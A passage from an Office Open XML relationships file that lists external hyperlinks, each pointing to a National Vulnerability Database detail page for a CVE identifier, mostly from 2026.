Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81564" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85628" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91097" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59193" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73445" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73469" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79700" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79701" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81565" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82784" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85188" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86443" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87727" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89021" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89207" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90593" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90603" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91198" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92215" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92220" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92362" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92401" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12985" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13265" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20248" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55837" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64684" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77401" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81052" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81326" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91100" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92140" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92800" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92812" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26947" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70425" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81049" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89332" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54177" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81051" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84537" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92615" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12759" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12765" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12767" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15396" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15412" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15634" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15814" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16187" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16588" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16702" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17463" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19033" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20283" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20287" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27553" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43791" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5132" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53716" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53719" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57120" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57173" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57822" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61588" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61908" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62949" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65395" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65412" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69147" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75880" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76438" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78227" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79725" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80126" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80378" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81554" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81910" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82092" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82100" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84487" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84519" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84536" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84588" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84596" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84597" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84635" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84859" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84993" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85171" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86358" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86764" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86882" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86885" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87073" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87076" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87116" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89034" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89044" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89158" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89160" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91181" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92139" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92417" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92457" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92460" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92462" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92463" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92468" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92567" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92570" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92583" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92597" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92598" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92600" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92603" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92605" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92750" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92759" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92760" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92765" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92770" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92771" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92775" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92789" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92790" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92795" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92811" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9812" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11222" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11996" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16185" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5920" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85172" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92358" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14275" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14276" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14277" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18120" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54452" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56719" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61589" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64717" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73169" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77360" TargetMode="External" Id="rId986" /><Relationship 